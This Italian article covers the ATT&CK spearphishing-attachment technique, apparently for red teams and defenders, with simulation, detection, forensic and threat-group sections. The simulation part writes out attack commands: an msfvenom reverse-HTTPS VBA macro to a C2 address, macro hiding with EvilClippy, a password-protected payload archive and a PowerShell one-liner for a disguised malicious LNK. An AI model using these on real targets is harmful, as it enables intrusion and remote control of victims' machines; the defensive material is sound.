Allegati Malevoli via Email Mirata: Spearphishing Attachment (T1566.001)

Per simulare questa tecnica in un esercizio red team servono due ingredienti: un payload credibile e un meccanismo di consegna controllato. Il punto di partenza è la generazione di un documento Office armato con macro VBA che esegua un beacon di ritorno.

Con Mythic (open source), si può generare un agente Apollo o HTTP in formato shellcode, da iniettare in un documento tramite macro. Il framework permette di personalizzare il profilo C2, rendendo il traffico simile a navigazione legittima. Per chi preferisce un approccio consolidato, Cobalt Strike (a pagamento) offre il modulo Artifact Kit per generare payload in formato HTA, VBA macro o DLL, da incorporare in documenti Office.

La creazione del documento armato può avvenire con diversi approcci. Utilizzando msfvenom (open source, parte di Metasploit Framework) si genera un payload VBA:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP_C2> LPORT=443 -f vba-psh -o macro.vba

Il codice risultante va incollato nell'editor macro di un documento Word salvato in formato .docm o .doc. Per un approccio più sofisticato, EvilClippy (open source) permette di nascondere le macro VBA dalla visualizzazione dell'editor, rendendo il documento più evasivo all'analisi manuale:

EvilClippy.exe -s hidden_macro.vba documento.docm

Per simulare la variante con archivio protetto da password — tattica utilizzata da gruppi come Cobalt Group, DarkHydrus e BlackTech — basta impacchettare il payload in un archivio ZIP o RAR cifrato e includere la password nel corpo dell'email. Su Linux:

zip -P "invoice2024" payload.zip documento_armato.docm

La fase di consegna in laboratorio si gestisce con GoPhish (open source), che consente di creare campagne di phishing realistiche con tracking di apertura, click e download. Si configura un template email che replica comunicazioni aziendali, si allega il documento malevolo e si traccia quali utenti aprono il file.

Per testare la variante con file LNK — vettore usato da Gamaredon Group e Silence — si può usare LNKUp (open source) per generare file di collegamento che eseguano comandi PowerShell all'apertura. L'alternativa è creare LNK malevoli tramite PowerShell nativo:

$s = New-Object -ComObject WScript.Shell; $l = $s.CreateShortcut("report.lnk"); $l.TargetPath = "powershell.exe"; $l.Arguments = "-ep bypass -f \\payload.ps1"; $l.IconLocation = "wordicon.ico"; $l.Save()

Infine, per validare la resilienza dell'ambiente, è utile testare con file in formati multipli — .docm, .xlsm, .hta, .chm, .iso — e verificare quali passano i filtri del gateway di posta. Il framework Atomic Red Team (open source) include test specifici per T1566.001 che automatizzano parte di queste verifiche.

La detection dello spearphishing con allegato si gioca su una catena di correlazione a tre stadi: ricezione dell'email, scrittura del file su disco e esecuzione anomala di processi. Spezzare questa catena in alert isolati genera rumore; collegarla in una sequenza temporale produce segnali ad alta fedeltà.

Il primo strato è il log di posta. Su ambienti Microsoft 365, i log m365:unified registrano metadati degli allegati inclusa l'estensione, l'hash e il mittente. La regola base filtra allegati con estensioni ad alto rischio: .exe, .js, .vbs, .docm, .xlsm, .hta, .chm, .iso, .img, .lnk, .scr. Ma il vero valore emerge quando si correla con ciò che accade sull'endpoint.

Su Windows, Sysmon (gratuito, Microsoft Sysinternals) è il pilastro. L'EventCode 1 (Process Create) rivela le catene padre-figlio sospette, che rappresentano il pattern più affidabile per questa tecnica. Le combinazioni da monitorare con priorità alta sono:

• winword.exe → powershell.exe o cmd.exe
• excel.exe → mshta.exe o wscript.exe
• outlook.exe → rundll32.exe
• Qualsiasi processo Office → certutil.exe o bitsadmin.exe

L'EventCode 11 (FileCreate) di Sysmon cattura la scrittura dell'allegato su disco, tipicamente nelle directory Temp dell'utente o nella cartella Downloads. Correlare la creazione del file con l'esecuzione di un processo entro una finestra temporale di 60-120 secondi riduce drasticamente i falsi positivi.

Su Linux, il sottosistema auditd monitora la creazione di file nelle directory di posta (/var/mail, ~/Maildir, ~/Downloads) tramite regole SYSCALL su execve. L'alert scatta quando un interprete — bash, python, perl — viene lanciato da un processo figlio del client di posta. Su macOS, i Unified Log tracciano catene anomale come Mail.app o Preview.app che generano processi Terminal o interpreti di scripting.

Per i falsi positivi, il tuning principale riguarda i documenti con macro legittime. La strategia consigliata è mantenere una whitelist basata su hash dei documenti aziendali autorizzati e sulle path di origine. Un documento .docm aperto da una cartella SharePoint interna ha un profilo di rischio diverso da uno scaricato da un allegato email esterno.

Il flusso di rete completa il quadro: Zeek (open source) o un IDS come Suricata (open source) identificano connessioni outbound anomale che seguono l'apertura del documento, specialmente verso IP non categorizzati o domini registrati di recente. L'integrazione con il SIEM — Splunk (a pagamento) o Elastic Security (freemium) — consente di costruire regole di correlazione che uniscano evento email, file creation ed esecuzione anomala in un singolo incident.

Infine, come controlli preventivi: l'implementazione di SPF, DKIM e DMARC riduce lo spoofing del mittente, mentre il blocco delle estensioni pericolose a livello di gateway postale elimina una porzione significativa di vettori prima che raggiungano l'utente.

L'analisi forense di un attacco via allegato malevolo segue il flusso naturale dell'intrusione: dalla ricezione dell'email all'esecuzione del payload, fino alle prime azioni post-compromise. Ogni stadio lascia artefatti specifici che, ricostruiti in sequenza, raccontano la storia dell'attacco.

Il primo artefatto è l'email stessa. I file .eml o .msg conservano gli header completi, che rivelano la catena di relay, i risultati SPF/DKIM/DMARC e l'IP del server di origine. Lo strumento msgconvert (open source, pacchetto libemail-outlook-message-perl) converte i file .msg in .eml per facilitare l'analisi. Gli header X-Originating-IP e Received permettono di tracciare il percorso reale del messaggio.

L'allegato estratto va analizzato senza esecuzione. Per documenti Office, oletools (open source) è indispensabile. Il comando olevba estrae e analizza macro VBA, identificando pattern sospetti come chiamate a Shell, CreateObject, WScript.Shell o codifica Base64:

olevba --deobf documento_sospetto.docm

Per file compressi protetti da password, 7-Zip (open source) tenta l'estrazione con la password eventualmente trovata nel corpo dell'email. L'analisi degli eseguibili estratti prosegue con FLOSS (open source, Mandiant) per l'estrazione di stringhe offuscate e pe-sieve (open source) per l'analisi di anomalie strutturali nel PE.

Su Windows, la timeline si costruisce incrociando più fonti. Il registro NTUSER.DAT dell'utente contiene le chiavi RecentDocs e UserAssist che documentano l'apertura del file e l'esecuzione delle applicazioni associate. La Prefetch directory (C:\Windows\Prefetch) registra l'esecuzione di binari come powershell.exe, mshta.exe o cmd.exe con timestamp precisi — fondamentale per collocare nel tempo il momento in cui la macro ha lanciato il payload.

I Jump List dell'applicazione Office che ha aperto il documento (tipicamente in %AppData%\Microsoft\Office\Recent) confermano quale file è stato aperto e quando. La MFT ($MFT) del volume NTFS rivela la creazione di file temporanei nella directory %TEMP% dell'utente, dove spesso il payload viene scritto prima dell'esecuzione.

Per la componente di rete, i log del proxy o del firewall mostrano la prima connessione verso l'infrastruttura C2, che tipicamente avviene entro secondi dall'esecuzione del payload. L'analisi con Wireshark (open source) dei PCAP catturati identifica i beacon iniziali — spesso HTTP/HTTPS verso domini giovani o IP hardcoded.

Su Linux, auditd fornisce i log SYSCALL che tracciano l'esecuzione di processi dalla directory dell'utente di posta. Il comando ausearch -sc execve -ts recent filtra le chiamate di sistema rilevanti. Su macOS, il database KnowledgeC.db e i Unified Log con predicato process == "Mail" registrano l'interazione dell'utente con l'allegato.

La correlazione temporale tra apertura del documento (RecentDocs/UserAssist), creazione del payload su disco (MFT/Prefetch), esecuzione del processo figlio (Sysmon EventCode 1) e prima connessione C2 (log proxy) costruisce una timeline che dimostra la catena causale completa dall'email alla compromissione.

Con 77 gruppi documentati, lo spearphishing con allegato è la tecnica di accesso iniziale più trasversale nel panorama delle minacce. L'analisi dei pattern rivela cluster geografici, preferenze di formato e sovrapposizioni operative che permettono di anticipare le mosse degli avversari.

APT29 utilizza allegati con exploit per colpire bersagli governativi e diplomatici, con una catena che in campagne documentate ha visto l'impiego di EnvyScout come primo stadio distribuito via email. Il gruppo predilige la sofisticazione: documenti che sfruttano vulnerabilità piuttosto che semplici macro, elevando la probabilità di successo contro target con difese mature.

Lazarus Group ha dimostrato versatilità operativa notevole. Nella campagna Operation Dream Job (C0022), condotta tra settembre 2019 e agosto 2020, il gruppo ha inviato allegati malevoli nel contesto di false offerte lavorative, colpendo settori difesa, aerospazio e governo in cinque paesi. Il malware ThreatNeedle è stato distribuito tramite documenti Word armati — un pattern ripetuto con costanza. BLINDINGCAN e ROKRAT sono altre famiglie distribuite sistematicamente con questo vettore dal cluster nordcoreano, dove anche Kimsuky opera con allegati Word, Excel e HWP, con una preferenza per formati locali come Hangul Word Processor che rivelano il targeting verso la penisola coreana.

Sandworm Team ha usato allegati Office malevoli nella campagna 2015 Ukraine Electric Power Attack (C0028), ottenendo l'accesso iniziale ai sistemi IT delle sottostazioni elettriche ucraine — il primo attacco documentato contro una rete elettrica. Il gruppo affianca allegati ZIP a documenti Office, mantenendo un profilo operativo focalizzato su infrastrutture critiche.

Mustang Panda rappresenta il pattern classico dell'espionage sinocentrico: nella campagna RedDelta Modified PlugX Infection Chain Operations (C0047), attiva da metà 2023 a fine 2024, il gruppo ha usato allegati di spearphishing per distribuire PlugX contro entità nel Sud-Est asiatico. La catena include archivi RAR e ZIP contenenti EXE legittimi con DLL malevole (DLL side-loading), una firma tecnica ricorrente.

Sul fronte finanziario, FIN7 e Cobalt Group condividono l'uso di documenti RTF e Office con macro come vettore primario. Cobalt Group si distingue per la varietà di formati — .rtf, .doc, .xls, archivi con LNK, archivi cifrati con .exe e .scr — suggerendo un'operazione di testing continuo dei filtri di posta. Wizard Spider, con la distribuzione di Emotet, TrickBot e Bazar via allegati macro, ha alimentato l'ecosistema ransomware che ha portato a campagne come C0015, dove il playbook Conti è stato eseguito a partire da un allegato di phishing.

Il trend evolutivo mostra uno spostamento dai formati macro-dipendenti (VBA in .docm) verso container come ISO, IMG e archivi protetti da password, che eludono i Mark-of-the-Web e i controlli dei gateway. La campagna Water Curupira (C0037) nel 2023 ha distribuito Pikabot tramite archivi ZIP protetti, seguendo il vuoto lasciato dal takedown di QakBot. EXOTIC LILY ha introdotto il thread-hijacking con allegati ISO, dimostrando come il social engineering si evolva parallelamente ai formati di payload.

Framework MITRE ATT&CK v16 — T1566.001 (Spearphishing Attachment), TA0001. Campagne: C0028, C0001, C0015, C0016, C0037, C0011, C0005, C0022, C0047. Detection: Sysmon, auditd, Zeek, Suricata. Analisi: oletools, FLOSS, pe-sieve. Simulazione: GoPhish, Atomic Red Team, Mythic. Integrato con conoscenza professionale per tool e procedure operative.